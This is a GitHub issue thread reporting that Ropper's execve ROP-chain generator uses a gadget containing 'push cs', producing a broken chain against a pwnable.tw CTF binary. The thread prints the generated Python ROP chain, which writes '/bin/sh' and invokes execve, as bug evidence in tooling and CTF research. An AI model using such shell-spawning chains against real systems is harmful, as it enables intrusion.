### ISSUE TITLE
Incorrectly generated ROP chain due to push instruction in a gadget

### ISSUE THREAD

**Issue by marccane** [sashs/Ropper#154]
When calling the executable version 1.13.6 with `ropper --chain=execve -f calc > rop.py` it generates a broken rop chain.
This is caused by a **push cs** instruction in a gadget used by the rop generator, which is not taken into account afterwards.

<details>
  <summary>Click to expand rop.py</summary>
    #!/usr/bin/env python
    # Generated by ropper ropchain generator #
    from struct import pack
    
    p = lambda x : pack('I', x)
    
    IMAGE_BASE_0 = 0x08048000 # 9b512798dde5278069d892c4f465d82e29c1b28260b84657533af664d7dbc00a
    rebase_0 = lambda x : p(x + IMAGE_BASE_0)
    
    rop = ''
    
    rop += rebase_0(0x0001434b) # 0x0805c34b: pop eax; ret;
    rop += '//bi'
    rop += rebase_0(0x000281aa) # 0x080701aa: pop edx; ret;
    rop += rebase_0(0x000a4060)
    rop += rebase_0(0x0005330d) # 0x0809b30d: mov dword ptr [edx], eax; ret;
    rop += rebase_0(0x0001434b) # 0x0805c34b: pop eax; ret;
    rop += 'n/sh'
    rop += rebase_0(0x000281aa) # 0x080701aa: pop edx; ret;
    rop += rebase_0(0x000a4064)
    rop += rebase_0(0x0005330d) # 0x0809b30d: mov dword ptr [edx], eax; ret;
    rop += rebase_0(0x0001434b) # 0x0805c34b: pop eax; ret;
    rop += p(0x00000000)
    rop += rebase_0(0x000281aa) # 0x080701aa: pop edx; ret;
    rop += rebase_0(0x000a4068)
    rop += rebase_0(0x0005330d) # 0x0809b30d: mov dword ptr [edx], eax; ret;
    rop += rebase_0(0x000001d1) # 0x080481d1: pop ebx; ret;
    rop += rebase_0(0x000a4060)
    rop += rebase_0(0x000a07d0) # 0x080e87d0: pop ecx; push cs; or al, 0x41; ret;
    rop += rebase_0(0x000a4068)
    rop += rebase_0(0x000281aa) # 0x080701aa: pop edx; ret;
    rop += rebase_0(0x000a4068)
    rop += rebase_0(0x0001434b) # 0x0805c34b: pop eax; ret;
    rop += p(0x0000000b)
    rop += rebase_0(0x00028880) # 0x08070880: int 0x80; ret;
    print rop
</details>

The binary is a 32 bit x86 ELF from pwnable.tw which can be found [here](https://pwnable.tw/static/chall/calc).
I attach 3 images from gdb taken while debugging the rop chain.
<details>
  <summary>Click to expand images</summary>

![before_push](https://user-images.githubusercontent.com/7304787/150690434-b1f7738e-9670-42f4-8a32-695e1eef34f7.png)

![after_push](https://user-images.githubusercontent.com/7304787/150690438-71bb1b7c-712a-4e57-be4b-e1be934df44f.png)

![crash](https://user-images.githubusercontent.com/7304787/150690441-8f3371b7-58d3-4a96-8bc9-5326887e63e3.png)
</details>

This could be fixed by ignoring gadgets with instructions that have undesired affects on the stack (including, but not limited to, push instructions) while generating rop chains.

**Comment by sashs** [comment]
Hi. Thx for reporting that. I have fixed it today and will push it later.
